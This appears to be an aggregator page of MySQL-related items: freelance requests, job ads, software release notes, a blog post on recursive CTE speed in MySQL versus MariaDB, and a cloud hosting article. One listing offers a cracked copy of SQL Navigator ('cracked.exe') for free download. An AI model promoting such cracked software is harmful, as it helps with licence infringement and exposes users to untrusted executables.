Hi i need help with setting up ring central api and answer to this question: devcommunity.ringcentral.com/ringcentraldev/topics/send-request-to-our-webpage-when-we-start-and-end-a-call developer.ringcentral.com/api-reference... (Budget: $10 - $30 USD, Jobs: Javascript, MySQL, PHP, Software Architecture, XML)
          Senior Consultant - Linux Platform Administrator - IT Consultores S.A.S - Medellín, Antioquia, Colombia      Cache   Translate Page      
A company specializing in IT consulting requires: Requirements: degree in Systems Engineering or a related field. Must have at least 3 years of professional experience deploying server infrastructure to support mission-critical applications and/or as a Linux platform administrator. Must have intermediate knowledge of Linux, networking, and on-premise and cloud infrastructures. Knowledge of MySQL database administration is desirable. ...
          CockroachDB 2.1.0      Cache   Translate Page      
The team behind CockroachDB has released version 2.1.0. This is an open-source database that is particularly well suited to cloud environments and that, thanks to its distributed design, offers several options for coping with failures. For more information we refer to this page, where the most frequently asked questions are answered. The list of changes is as follows: What's New in v2.1.0 With the release of CockroachDB v2.1, we've made it easier than ever to migrate from MySQL and Postgres, improved our scalability on transactional workloads by 5x, enhanced our troubleshooting workflows in the Admin UI, and launched a managed offering to help teams deploy low-latency, multi-region clusters with minimal operator overhead. Enterprise Features These new features require an enterprise license.
          Application Enhancement      Cache   Translate Page      
Need a freelancer with phenomenal knowledge of CSS and the PHP Zend Framework to enhance the existing product. The HRMS application needs enhancements to its general look and feel. Kindly reply to me if you are interested in getting involved... (Budget: ₹12500 - ₹37500 INR, Jobs: Bootstrap, CSS, HTML, MySQL, PHP)
          Custom unit addition based on given extension      Cache   Translate Page      
Based on an extension, I need a unit addition parameter. The user specifies that product A has to have 5 additions each, so when the client orders it he will only be able to place an order in 5, 10, 15 units... (Budget: $30 - $250 USD, Jobs: C# Programming, Javascript, MySQL, PHP, Software Architecture)
          Complement the Guest House Bookings website -- 2      Cache   Translate Page      
We have a guest house booking website with 2 options: one for traditional booking, where the user books a specific guest house; the second for booking a package with its included services. We have an admin control panel... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Junior Database Administrator - University of Saskatchewan - Saskatoon, SK      Cache   Translate Page      
PostgreSQL, MySQL, SQL Server, Oracle. The salary range, based on 1.0 FTE, is CAD $48,334.00 - 75,523.00 per annum (Information Technology/Phase 1).... $48,334 - $75,523 a year
From University of Saskatchewan - Wed, 31 Oct 2018 00:18:52 GMT - View all Saskatoon, SK jobs
          What's the acceptable ping for external mySQL Database ?      Cache   Translate Page      
As of right now I am using Google App Engine. The problem is that Google Cloud SQL is very expensive, so I am offloading the MySQL server to DigitalOcean. The reason I am using Google App Engine is becaus ... - Source: www.lowendtalk.com
          Développeur Back-End PHP / Back-End Developer - ADFAB - Montréal, QC      Cache   Translate Page      
For the database we stay classic with MySQL, but we are trying things with MongoDB, ElasticSearch... ADFAB is a development studio.... $45,000 - $65,000 a year
From Indeed - Wed, 24 Oct 2018 11:05:13 GMT - View all Montréal, QC jobs
          fix wp-pro-quiz wordpress plugin with some customization      Cache   Translate Page      
The description of the work is in the attachment. It would be some fixes and customization of wp-pro-quiz. Excuse me for my English... I await your offers... thank you in advance. I'm flexible and await your... (Budget: €30 - €250 EUR, Jobs: CSS, HTML, MySQL, PHP, WordPress)
          Android Developer - Vikas Global Solutions Ltd - Madhavanpark, Karnataka      Cache   Translate Page      
Android Application Development, Android SDKs, API, HTML, CSS, MySQL. Android Application Development. Vikas Global Solutions Ltd....
From Indeed - Mon, 10 Sep 2018 05:26:38 GMT - View all Madhavanpark, Karnataka jobs
          Common Table Expressions: A Shocking Difference Between MySQL and MariaDB      Cache   Translate Page      
Common Table Expressions (CTEs) are a very useful tool and frankly a big improvement on sub-queries. But there are differences in how they are implemented in MySQL and MariaDB. That is not too surprising, since the code bases forked many years ago. Different engineers implementing the same idea will have different approaches (and sometimes results). But differences in implementation are often important and, in this case, shockingly different.

Jesper Wisborg Krogh gave a series of excellent presentations and hands-on labs at Oracle OpenWorld and CodeOne. He is an amazing Support Engineer and a great presenter of material at conferences. In the lab for Common Table Expressions he pointed out to me an interesting problem in MariaDB's implementation of CTEs.

The Problem In a Nutshell

On the PostgreSQL Wiki, there is an SQL query (requires PostgreSQL 8.4 or MySQL 8.0) that produces an ASCII-art image of the Mandelbrot set, written entirely in SQL:2008-conforming SQL.

    -- Based on: https://wiki.postgresql.org/wiki/Mandelbrot_set
    WITH RECURSIVE x(i) AS (
        SELECT CAST(0 AS DECIMAL(13, 10))
         UNION ALL
        SELECT i + 1
          FROM x
         WHERE i < 101
    ),
    Z(Ix, Iy, Cx, Cy, X, Y, I) AS (
        SELECT Ix, Iy, X, Y, X, Y, 0
          FROM (SELECT CAST(-2.2 + 0.031 * i AS DECIMAL(13, 10)) AS X,
                       i AS Ix FROM x) AS xgen
               CROSS JOIN (
                   SELECT CAST(-1.5 + 0.031 * i AS DECIMAL(13, 10)) AS Y,
                          i AS iY FROM x
               ) AS ygen
        UNION ALL
        SELECT Ix, Iy, Cx, Cy,
               CAST(X * X - Y * Y + Cx AS DECIMAL(13, 10)) AS X,
               CAST(Y * X * 2 + Cy AS DECIMAL(13, 10)), I + 1
          FROM Z
         WHERE X * X + Y * Y < 16.0
               AND I < 27
    ),
    Zt (Ix, Iy, I) AS (
        SELECT Ix, Iy, MAX(I) AS I
          FROM Z
         GROUP BY Iy, Ix
         ORDER BY Iy, Ix
    )
    SELECT GROUP_CONCAT(
               SUBSTRING(
                   ' .,,,-----++++%%%%@@@@#### ',
                   GREATEST(I, 1),
                   1
               ) ORDER BY Ix SEPARATOR ''
           ) AS 'Mandelbrot Set'
      FROM Zt
     GROUP BY Iy
     ORDER BY Iy;

The code is best run on the new MySQL Shell or MySQL Workbench, but it also works on the old MySQL shell, just with desegregated output.

[Figure: An abbreviated image of the Mandelbrot SQL output (see above for the listing), truncated for size. Produced with the new MySQL Shell (mysqlsh) on MySQL 8.0.13.]

Jesper mentioned he had tested the SQL the night before the lab and that it runs quickly on MySQL: 0.7445 seconds on my Windows laptop.

[Figure: The Mandelbrot SQL code ran in 0.74445 seconds on MySQL 8.0.13.]

But not on MariaDB. Jesper said he ran the same code on MariaDB 10.3 but killed it after fifteen minutes. It was late and he had to get up early to get to San Francisco.

Double Check

With a fresh install of Fedora 29 and MariaDB 10.3.10, I ran the Mandelbrot SQL code. And I waited for the result. After an hour I went to lunch. But the query was still running when I returned. I went on to other work, occasionally checking back and running SHOW PROCESSLIST from time to time to make sure it had not died. But after two hours I hit control-C, as I had other tasks for that system. There are some interesting recursive CTE problems listed on jira.mariadb.org, but nothing obviously relevant.

I was able to confirm that MySQL's implementation of recursive CTEs works well, but I cannot say that about MariaDB's implementation.
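For a quicker sanity check than the Mandelbrot query, a minimal recursive CTE such as the one below (standard syntax that should be accepted by both MySQL 8.0 and MariaDB 10.2+) returns instantly on either server; it is the deep, heavily nested recursion above, not recursive CTEs as such, that exposes the difference. This small example is added here for illustration and is not from the original post.

    -- The integers 1..10 with a running total.
    WITH RECURSIVE seq (n, running_total) AS (
        SELECT 1, 1
        UNION ALL
        SELECT n + 1, running_total + n + 1
          FROM seq
         WHERE n < 10
    )
    SELECT n, running_total FROM seq;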
          Iperius Backup Full 5.8.1      Cache   Translate Page      
Iperius Backup Full 5.8.1

Iperius Backup is a program for backing up, restoring and synchronizing data, compatible with all Windows platforms. It can run automatic backups to many kinds of storage media: external USB disks, RDX media, NAS, LTO/DAT tape drives, remote computers and sites over FTP, and cloud storage. Iperius Backup includes drive imaging, backup of Microsoft SQL Server, MySQL, PostgreSQL and Oracle Database databases, and Disaster Recovery.
          Update phpmyadmin on ubuntu 18.x      Cache   Translate Page      
I need help updating phpMyAdmin from 4.6.6 to the latest version on Ubuntu 18.x. I can grant SSH access. This work is not urgent (Budget: $10 - $30 USD, Jobs: Apache, Linux, MySQL, System Admin, Ubuntu)
          upload a wordpress site from dev to live server      Cache   Translate Page      
Upload a WordPress site and its database from the dev server to the live server, and update the DB links to the new domain (Budget: €30 - €250 EUR, Jobs: HTML, MySQL, PHP, Website Design, WordPress)
          migrating my script from Tropo to Twilio      Cache   Translate Page      
Need a good XML/PHP Twilio programmer to handle this ASAP. I want to convert my script from Tropo to Twilio; please confirm if this is possible. (Budget: $10 - $30 USD, Jobs: Javascript, MySQL, PHP, Software Architecture, XML)
          Support for the Newscoop CMS      Cache   Translate Page      
We need a person who is an expert in and knowledgeable about the Newscoop CMS to do a general review and determine why news items are not being published correctly. Latin American candidates preferred. (Budget: $30 - $250 USD, Jobs: Article Writing, CMS, MySQL, PHP, Website Design)
          Php Developer Urgent Hirings      Cache   Translate Page      
RSS Feed, SVN Server, Flash Cpanel, MySQL, Dreamweaver, Analytic
          .Net Developer (M/F)      Cache   Translate Page      
Within a major consulting firm that is well recognized in its market, you will join the IT department's team. As a .Net Developer, your main duties will be the following: * Developing the company's internal applications, in line with the needs of the various business teams (client extranet, internal micro-service tools, etc.), * Maintaining the existing applications and making them evolve, * Mastering and working on the existing databases (Oracle, MySQL), * Taking part in Datawarehouse development projects (Talend), * Training users on the business tools and the applications produced. This description covers the main responsibilities; it is not exhaustive.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          mysqltools-python 2.18.11.06      Cache   Translate Page      
none
          Coda 2.6.1 (2017)      Cache   Translate Page      
Coda 2.6.1 is an editor for web developers. Make your code beautiful with Coda! A text editor, file transfer, SVN, a CSS editor, a terminal, access to development books and much more. In total there are around a hundred features, for example: a built-in MySQL editor, live code hints, pop-up color palettes and a live preview mode built into the CSS editor, "smart" tabs, improved site management, and much more.
          Handy Backup Small Server 7.18.0      Cache   Translate Page      
See more info

Author: Novosoft Handy Backup
File size: 164.30 Mb
Release date: 2018-11-07
Screenshot: Screenshot
Description: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.
          DBeaver 5.2.4      Cache   Translate Page      
DBeaver is a universal database manager and SQL Client. It supports MySQL, PostgreSQL, Oracle, DB2, MSSQL, Sybase, Mimer, HSQLDB, Derby, and any database that has a JDBC driver.
          Complement the Guest House Bookings website -- 3      Cache   Translate Page      
We have a guest house booking website with 2 options: one for traditional booking, where the user books a specific guest house, and a second for booking a package with its included services. We have an admin control panel... (Budget: $250 - $750 USD, Jobs: Graphic Design, HTML, MySQL, PHP, Website Design)
          Completely clean up 20 hacked wordpress installations      Cache   Translate Page      
I have multiple WordPress installations on the same server - around 20. They have all been hacked using the same method. They have the following code in the header of the *.php files (see attached hacked_code.txt)... (Budget: $250 - $750 USD, Jobs: HTML, MySQL, PHP, Web Security, WordPress)
          Drupal Developer      Cache   Translate Page      
NC-Raleigh, job summary: An exciting digital marketing agency is looking for a driven (direct hire) developer with working knowledge of Drupal, PHP, JavaScript, and MySQL to join their team in Raleigh, NC. This role is great if you want to be a part of building products that deliver meaningful results and refreshing user experiences. location: Raleigh, North Carolina job type: Permanent work hours: 8 to 5 ed
          Membership Website Using Inbuilt Plugin of any CMS/Framework with Stripe Payment Method      Cache   Translate Page      
Hi, we are looking to build a membership website where we can show the products we are selling (we sell access to expensive websites, so everything is digital; in fact we just give users the username... (Budget: $15 - $25 USD, Jobs: MySQL, PHP, Plugin, Website Design, WordPress)
          fix PHP Skript      Cache   Translate Page      
The script is an auto-fill form bot (sync/cron job) for a website called flohmarkt.at that posts our ad automatically. It worked for 3 months without any trouble. However, the PHP code is now probably damaged... (Budget: €8 - €30 EUR, Jobs: HTML, Javascript, MySQL, PHP)
          Développeur Back-End PHP / Back-End Developer - ADFAB - Montréal, QC      Cache   Translate Page      
For databases we keep it classic with MySQL, but we are trying things out with MongoDB and ElasticSearch... ADFAB is a development studio.... $45,000 - $65,000 a year
From Indeed - Wed, 24 Oct 2018 11:05:13 GMT - View all Montréal, QC jobs
          Développeur Front (JS/HTML/CSS) / Front End Developer - ADFAB - Montréal, QC      Cache   Translate Page      
For databases we keep it classic with MySQL, but we are trying things out with MongoDB and ElasticSearch... ADFAB is a development studio.... $45,000 - $65,000 a year
From Indeed - Wed, 24 Oct 2018 11:00:16 GMT - View all Montréal, QC jobs
          PHP & MySQL For Dummies – Janet Valade – 3rd Edition      Cache   Translate Page      

Solutions Manual

Build an online catalog and a members-only site. Everything you need to know to create a dynamic PHP and MySQL [...]

The post PHP & MySQL For Dummies – Janet Valade – 3rd Edition appeared first on Solutions Manual.


          Engineer I - Software - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, SQL Server, Oracle, PostgreSQL. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to redefine the communications...
From DISH - Sat, 27 Oct 2018 12:43:20 GMT - View all Cheyenne, WY jobs
          Software Engineer w/ Active DOD Secret Clearance (Contract) - Preferred Systems Solutions, Inc. - Cheyenne, WY      Cache   Translate Page      
Experience with MySQL, Microsoft SQL Server, and Oracle databases. Experts Engaged in Delivering Their Best - This is the cornerstone of our service-oriented...
From Preferred Systems Solutions, Inc. - Tue, 25 Sep 2018 20:46:05 GMT - View all Cheyenne, WY jobs
          Securing a PHP website      Cache   Translate Page      
Hello, I have ready-made content and websites built with PHP, and it seems there are many vulnerabilities associated with them. I need someone to scan for those vulnerabilities and apply the recommended fixes... (Budget: $30 - $250 USD, Jobs: HTML, MySQL, PHP, Web Security, Website Design)
          Technical Architect (Salesforce experience required) Cheyenne - Silverline Jobs - Cheyenne, WY      Cache   Translate Page      
Competency with Microsoft SQL Server, MYSQL, postgreSQL or Oracle. Do you want to be part of a fast paced environment, supporting the growth of cutting edge...
From Silverline Jobs - Sun, 29 Jul 2018 06:18:46 GMT - View all Cheyenne, WY jobs
          Senior Data Engineer - DISH Network - Cheyenne, WY      Cache   Translate Page      
MySQL, MS SQL, Oracle, or other professional database system. DISH is a Fortune 200 company with more than $15 billion in annual revenue that continues to...
From DISH - Wed, 15 Aug 2018 05:17:45 GMT - View all Cheyenne, WY jobs
          Iperius Backup Full 5.8.1 ML/RUS      Cache   Translate Page      
Iperius Backup is a program for backing up, restoring and synchronizing data, compatible with all Windows platforms. It can run automatic backups to many types of storage media: external USB drives, RDX media, NAS, LTO/DAT tape drives, remote computers and FTP sites, and cloud storage. Iperius Backup includes disk imaging, backup of Microsoft SQL Server, MySQL, PostgreSQL and Oracle Database databases, and disaster recovery.
          SoftoRooM -> SQL Navigator 7.5      Cache   Translate Page      
PRYANIK:
Your software forum: SoftoRooM

Quest SQL Navigator XPert Edition

Description (ru): SQL Navigator is software that helps you develop high-quality applications and simplifies the process of writing, editing and maintaining database objects.

By downloading Quest SQL Navigator you can get more out of your Oracle DBMS, maintain defined levels of application/database performance, give developers or database administrators access to non-Oracle database platforms for queries, browsing and reporting, and enforce business rules to guarantee data correctness and compliance with business policies.
SQL Navigator provides SQL tuning to keep performance problems from affecting application users.

Key features of SQL Navigator:
▲ Precise writing, debugging and tuning of program code.
▲ The flexibility to carry out many development and administration tasks with a single tool.
▲ The ability to switch easily from one task to another.
▲ Efficiency in everyday tasks.
▲ Reporting that produces quantitative data and documentation.
▲ Support for working in teams.
▲ Lower overall development and administration costs through task automation.
▲ Quick connections to Oracle, SQL Server, MS Access, Sybase and MySQL for queries and reports.
▲ Access to Oracle expertise through the various Toad user communities.
▲ A consistent, continuous and measurable process for managing shared database development projects.
▲ Compliance with service level agreement (SLA) requirements.
▲ Includes the SQL Optimization product for automatically rewriting SQL code that could otherwise badly degrade performance.
▲ Detects vulnerable areas in the code and provides visibility into logical PL/SQL code coverage.


description (en) SQL Navigator SQL Navigator for Oracle helps you write better code faster

Deliver high-quality applications faster than ever by being able to write, edit and maintain database objects through automation and an intuitive graphical interface. Experience our powerful SQL software tool that optimizes performance issues before they impact production and end users.

Choose from four editions : SQL Navigator Base Edition, SQL Navigator Professional Edition, SQL Navigator Xpert Edition and SQL Navigator crack Developer Edition.
(supports Oracle 12c and Windows 8)

Features
Code Xpert
Determines software quality, abbreviates test cycles, reduces error rates, alleviates maintenance efforts, discovers software changes, and identifies high-risk code through industry-leading metrics and test coverage techniques
Team coding
Helps you maintain code integrity and integration with version control
ER diagram
Enables you to model a table, and view the dependencies and joins to other tables
Code road map
Highlights the complex interdependencies of your PL/SQL code within the database
SQL Optimizer for Oracle
This Oracle database development solution delivers integrated and enhanced SQL optimization functionality in the SQL Navigator Xpert Edition crack, and provides intelligent recommendations, SQL scanning and index optimization.


Interface languages: En
OS: Windows 10/8 (32bit-64bit)
Homepage: www.quest.com
Free download: SQL Navigator XPert Edition 7.5 + crack (cracked.exe), ~90 Mb

SQL Navigator XPert Edition 7.5.0.82 x86
SQL Navigator XPert Edition 7.5.0.82 x64

SQL Navigator 7.5
Source: www.softoroom.net

          PHP Developer      Cache   Translate Page      
Desired Applicant Profile: Must be proficient in PHP, MySQL, CSS, HTML, Javascript, AJAX, XML
          Php developer      Cache   Translate Page      
Build, maintain, and optimize PHP web applications. MySQL with strong query knowledge (Mandatory
          $24.99 - For sale: Php And Mysql by Larry Ullman - $24 @stanford.edu      Cache   Translate Page      
Marketplace $24.99 - For sale: Php And Mysql by Larry Ullman Listed by you on September fifth
          Php developer      Cache   Translate Page      
PHP Developer - PHP, Laravel/Symfony, MySQL, Magento, Git Salary - £30,000 / £40,000 Location
          PHP/CodeIgniter programmer needed      Cache   Translate Page      
Toronto-based startup firm is looking for a PHP/LAMP developer with a guaranteed minimum workload of 20 hours per week. The candidate must have prior work experience with the CodeIgniter framework. The candidate must be able to communicate in English. Looking for a dedicated and motivated individual... (Budget: $15 - $25 CAD, Jobs: Bootstrap, Codeigniter, jQuery / Prototype, MySQL, PHP)
          Writers Editor Project -- 2      Cache   Translate Page      
Very very similar to https://www.zoho.com/writer/ Please look at specs in the file I have attached. (Budget: $250 - $750 USD, Jobs: Javascript, MySQL, node.js, PHP, Software Development)
          Build a new website in wordpress      Cache   Translate Page      
I need a developer who can create a new website similar to http://kudzu.com and copy content and reviews from that website to the new one. (Budget: $30 - $250 USD, Jobs: Full Stack Development, HTML, MySQL, PHP, Web Development, Website Design, WordPress)
          Drag and drop magazine layout organizer      Cache   Translate Page      
Hi, I need to create a drag and drop magazine layout organizer in PHP, jQuery, Ajax and MySQL. Basically I need to have all the customers on the left side and 60 boxes on the right side (the boxes are the pages, and they need to be laid out in 4 columns), and then be able to drag and drop each customer into a specific box or page. I also need to be able to sort customers inside a box (maximum 4 per box), and finally to be able to add an extra page or box at any moment in the middle of the existing ones, with the program re-sorting everything automatically. I also need to be able to add new customers at any time and select whether their ad is full page, half page, quarter, etc. (Prize: 100)
          sysutils/bacula9-docs - 9.2.2      Cache   Translate Page      
Upgrade to 9.2.2 https://blog.bacula.org/bacula-release-9-2-2/ Note: if you are running MySQL and have not recently executed src/cats/update_bacula_tables, please do so. It will not change your database version but it will fix some potential MySQL problems (for more details see the release notes for version 9.2.1).
          sysutils/bacula9-server - 9.2.2      Cache   Translate Page      
Upgrade to 9.2.2 https://blog.bacula.org/bacula-release-9-2-2/ Note: if you are running MySQL and have not recently executed src/cats/update_bacula_tables, please do so. It will not change your database version but it will fix some potential MySQL problems (for more details see the release notes for version 9.2.1).
          دانلود Udemy Using MySQL Databases With Python آموزش پایگاه داده مای اس کیو ال همراه با پایتون      Cache   Translate Page      

This database is offered both free of charge [Community] and as a commercial product [Enterprise]. The edition used on hosting systems is the free one, while the commercial edition is aimed at large organizations and very large, heavily used databases. In the Udemy course Using MySQL Databases With Python you get an introductory look at MySQL and database design with it, together with Python.

The post Download Udemy Using MySQL Databases With Python - MySQL database training with Python appeared first on File Niko.


          I need someone who knows how to scrap openload links      Cache   Translate Page      
Hello, I need someone to show me how to scrape Openload links, because I need to scrape one site multiple times since there is always new content coming out. (Budget: $8 - $15 USD, Jobs: MySQL, PHP, Python, Software Architecture, Web Scraping)
          77:NoSQL之Memcached介绍及安装      Cache   Translate Page      
1. NoSQL: non-relational databases; the classic relational database is MySQL. With a relational database such as MySQL you can use SQL statements (CREATE, INSERT, UPDATE, SELECT, and so on), but the data has to be stored as databases, tables, rows and fields, and queries are matched row by row, which consumes a lot of resources when the query volume is very large. The storage principle of NoSQL is very simple (the data type is k-v): one key corresponds to one value, and there are no cumbersome relational chains, ...
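To make the key-value idea concrete, here is a minimal PHP sketch (my own illustration, not part of the original note) using the pecl Memcached extension against a memcached instance on the default local port; the key name is made up:

$mc = new Memcached();
$mc->addServer('127.0.0.1', 11211);        // default memcached host/port
$mc->set('user:42:name', 'Pedro', 300);    // one key -> one value, expires in 300 seconds
echo $mc->get('user:42:name');             // no tables, rows or joins: just a key lookup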
          Mysql 8.x [Err] 1055 only_full_group_by 问题记录      Cache   Translate Page      
The query raises the error [Err] 1055 - Expression #1 of SELECT list is not in GROUP BY clause and contains nonaggregated column for: SELECT c.*, COUNT(courseId) AS cnum FROM center_coursetime c WHERE isDel=0 GROUP BY schoolId ORDER BY c.createTime DESC. Solution: after logging in to MySQL, check the current sql_mode with SHOW VARIABLES LIKE ...
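For completeness (my addition, not part of the truncated note): with ONLY_FULL_GROUP_BY enabled, MySQL 5.7/8.0 rejects non-aggregated columns in such a query. Two common ways around it are ANY_VALUE() or removing the flag from sql_mode; a sketch using the table and columns from the error above:

-- Option 1: keep ONLY_FULL_GROUP_BY and mark the non-aggregated column explicitly
SELECT schoolId,
       ANY_VALUE(c.createTime) AS createTime,
       COUNT(courseId)         AS cnum
  FROM center_coursetime c
 WHERE isDel = 0
 GROUP BY schoolId;

-- Option 2: drop the flag for the current session only
SET SESSION sql_mode = (SELECT REPLACE(@@sql_mode, 'ONLY_FULL_GROUP_BY', ''));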
          Sviluppatore software      Cache   Translate Page      
I need a software developer to build a payments module using the third-party service Stripe, including the related API integration. (Budget: €250 - €750 EUR, Jobs: HTML, Javascript, MySQL, PHP, Software Architecture)
          Staff PHP Programmer Direktorat Sistem Informasi Manajemen UBAYA      Cache   Translate Page      

The UBAYA Directorate of Management Information Systems needs programmer staff. Job responsibilities: maintaining application software; developing application software. Experience requirements: experience building web-based applications. Skills: proficiency in the PHP programming language and the MySQL database (mastery of PostgreSQL is a major plus); able to work in a team; quick to adapt [...]

More info about the Staff PHP Programmer position at the UBAYA Directorate of Management Information Systems: check www.loker.id


          Best Practices of Web Application Hosting in Alibaba Cloud      Cache   Translate Page      

This article was originally published on Alibaba Cloud. Thank you for supporting the partners who make SitePoint possible.

Deploying a highly available and scalable web application in a traditional data center is a complex and expensive undertaking. One must invest a lot of effort and resources into capacity management. But more often than not, it ends up in over- or under-provisioning of resources, further resulting in inefficient investment in underutilized hardware. To tackle this challenge, Alibaba Cloud offers a reliable, scalable, and high-performing cloud infrastructure for the most demanding web application deployment scenarios. This document intends to provide practical solutions and best practices when it comes to scaling your web application on Alibaba Cloud.

Traditional Solution for Common Web Application Hosting

In a traditional web hosting space, designing a scalable architecture is always a challenge. The below diagram depicts a traditional web hosting model. The purpose of this diagram is to help you compare it with a similar architecture hosted on the cloud.

Traditional web hosting usually follows a three-tier design that divides the architecture into presentation, application, and persistence layers. The design achieves scalability through the inclusion of additional servers at each of these layers. The architecture also has built-in high availability features. The section below examines the means of deploying this traditional web hosting in Alibaba Cloud.

Simple Web Application Hosting Architecture on Alibaba Cloud

The diagram below shows what the traditional web hosting architecture looks like when deployed using various Alibaba Cloud products and services:

The key components of this architecture include:

  • Elastic Compute Service (ECS) — Built on Alibaba Cloud's own large-scale distributed computing system, Elastic Compute Service or ECS is a scalable and highly-efficient cloud computing service. Alibaba Cloud ECS helps you to quickly build more stable and secure web applications to adapt to your business' real-time needs.
  • Object Storage Service (OSS) — Alibaba Cloud offers various options to store, access, and backup your data on the cloud. For static storage, it provides Object Storage Service (OSS) to facilitate automatic data replication and failure recovery.
  • ApsaraDB for RDS — Relational Database Service or RDS is a stable, reliable, elastic and high-performance online database service based on Alibaba Cloud's own distributed system. It supports MySQL, SQL Server, PostgreSQL, and PPAS. Furthermore, it provides a comprehensive set of features including disaster recovery, data backup, monitoring, and migration.
  • DNS — Alibaba Cloud DNS service provides a highly available and scalable DNS service for your domain management needs. It automatically reroutes requests for your domain to the nearest DNS server.
  • Server Load Balancer (SLB) — Server Load Balancer is a web traffic distribution service that maximizes and extends the external service capabilities of your web applications. By seamlessly distributing traffic across multiple cloud servers and eliminating single points of failure, SLB enhances the reliability, usability, and availability of your applications.

Leveraging the Cloud for Web Application Hosting

When deploying a web application on Alibaba Cloud, you should consider making modifications in your deployment to fully utilize the advantages of the cloud. Below are some key considerations when hosting an application on Alibaba Cloud.

Multiple Data Centers in a Region

Within a certain region, Alibaba Cloud usually operates at least two data centers called Availability Zones (AZs). Elastic Compute Service (ECS) in different AZs are both logically and physically separated. Alibaba Cloud provides an easy-to-use model for deploying your applications across AZs for higher availability and reliability.

High Security for Web Applications and Servers

Web application security is one of the primary concerns for organizations today, with more than 90% of the applications being vulnerable to security attacks. These attacks can exploit websites and inherent servers, which puts businesses at the risk of financial loss. To protect your web applications from such attacks, Alibaba Cloud provides a suite of network and application security services, such as Anti-DDoS (Basic and Pro), Web Application Firewall (WAF), and Server Guard.

In addition to these services, users can proactively limit external traffic by defining firewalls and permissions. The diagram below depicts the Alibaba Cloud web application hosting architecture that comes with a group firewall to secure the entire infrastructure.

The post Best Practices of Web Application Hosting in Alibaba Cloud appeared first on SitePoint.


          Handy Backup Small Server 7.18.0      Cache   Translate Page      
See more info

Author: Novosoft Handy Backup
File size: 164.30 Mb
Release date: 2018-11-07
Screenshot: Screenshot
Description: Handy Backup Small Server is a full-featured backup solution for Windows Server 2016/2012/2008. Provides backup of files, HDDs, MS SQL, MS Exchange, MySQL, PostgreSQL, Oracle to local and external drives, FTP/SFTP/FTPS, WebDAV, or cloud storages.

          Mailwizz setup fix and optimize      Cache   Translate Page      
Hi there! I am looking for a freelancer with experience to check and correct a faulty MAILWIZZ setup, and also to optimize sending. The setup is pretty simple, Mailwizz installed on a VPS that connects to 5 MTAs on 5 different VPSs... (Budget: $30 - $250 USD, Jobs: Linux, Mailwizz, MySQL, PHP)
          Consultor Senior - Administrador de Plataformas Linux - IT Consultores S.A.S - Medellín, Antioquia, Colombia      Cache   Translate Page      
A company specializing in IT consulting requires: Requirements: a professional in Systems Engineering or related fields. Must demonstrate at least 3 years of professional experience deploying server infrastructure to support mission-critical applications and/or as a Linux platform administrator. Must have intermediate knowledge of: Linux, networking, on-premise and cloud infrastructures. Knowledge of MySQL database administration is desirable. ...
          geolocation script php      Cache   Translate Page      
We have a database with name, street and email, and we need a script to do 2 things: 1. send a message (email) to all users (from the database) near this street, let's say within a 5 km radius; 2. notify (like a poke)... (Budget: $30 - $250 USD, Jobs: AJAX, Javascript, MySQL, PHP, Software Architecture)
          Programador PHP, CSS y Mysql para arreglos en aula virtual (ESPAÑA) -- 2      Cache   Translate Page      
We are looking for a programmer for the small fixes we need to keep making to our virtual classroom built in PHP. It is important that they speak Spanish and work on Spain's schedule; this is an ongoing engagement since we have continuous work... (Budget: €18 - €36 EUR, Jobs: CSS, HTML, MySQL, PHP, Website Design)
          Twilio SMS simple survey      Cache   Translate Page      
Hello Freelancers, I'm looking to create a simple Twilio SMS survey that will message a list of users at a set time. I'm thinking the host will be an AWS Linux server running Python. I set up a simple survey in Twilio Studio, but need the data held on a server that I can review after... (Budget: $250 - $750 CAD, Jobs: Linux, MySQL, Python, Software Architecture, Web Hosting)
          Web System Administrator      Cache   Translate Page      
VA-Richmond, job summary: The Web Systems Administrator position is responsible for administration of the company's web server environment. The current environment includes Windows, Apache, IIS, Tomcat, PHP, Java, Drupal, WordPress, and MySql. This position is a member of the Web Technologies team, which supports SharePoint, SQL Reporting Services, Project Server, the company's websites and web portals. This p
          build a php form with signature      Cache   Translate Page      
This will be used as a waiver for a small local business. The form must have some text, fields and a signature panel. It must be mobile friendly. It must have an "add a minor" field for up to several minors. All the submitted forms will have to be viewable later... (Budget: $10 - $30 USD, Jobs: MySQL, PHP, WordPress)
          Build a Website      Cache   Translate Page      
I am looking for a professional developer to build me a website from scratch. Part of the details is in the attached file. The website needs to be in Arabic and support RTL. (Budget: $500 - $750 USD, Jobs: Graphic Design, MySQL, PHP, Python, Website Design)

          Added Namespace and lost all the PHP OOPs Classes      Cache   Translate Page      

Both the Web Host and MySql Database are in UK and have the default TimeZone set to ‘Europe/London’.

This is the current script I am using now that British Summer Time is over.

// Original JSON FORMAT stored in tblValues -> time
   $row->time ==> string(30) "2018-11-02T13:15:37.346992742Z"

// Conversion from JSON format to TimeStamp
  $tstamp = substr($tstamp, 0, 16);         // 2018-11-02T13:15
  $tstamp = str_replace('T', ' ', $tstamp); // 2018-11-02 13:15

  $iUK  = strtotime($tstamp); // 1539642060

 /* 
   $britishSummerTime=FALSE // Change again 2019-03-31 
   if( $britishSummerTime ):
      $iUK += 60*60; 
   endif;  
 */

// Modified and saved to tblResults->tStamp as MySqli TIMESTAMP
   $row->tstamp ==> string(19) "2018-11-02 13:15:37" 
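A hedged alternative to switching the offset by hand twice a year (my own sketch, not the poster's code): let DateTime convert the UTC value to Europe/London, so daylight saving is applied automatically:

// $row->time as in the post, e.g. "2018-11-02T13:15:37.346992742Z" (UTC)
$utc    = new DateTime(substr($row->time, 0, 19) . 'Z');         // trim the nanoseconds, keep the UTC marker
$london = $utc->setTimezone(new DateTimeZone('Europe/London'));  // BST/GMT handled for you
$tstamp = $london->format('Y-m-d H:i:s');                        // ready for the TIMESTAMP column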

           Last access of a DB in Mysql      Cache   Translate Page      

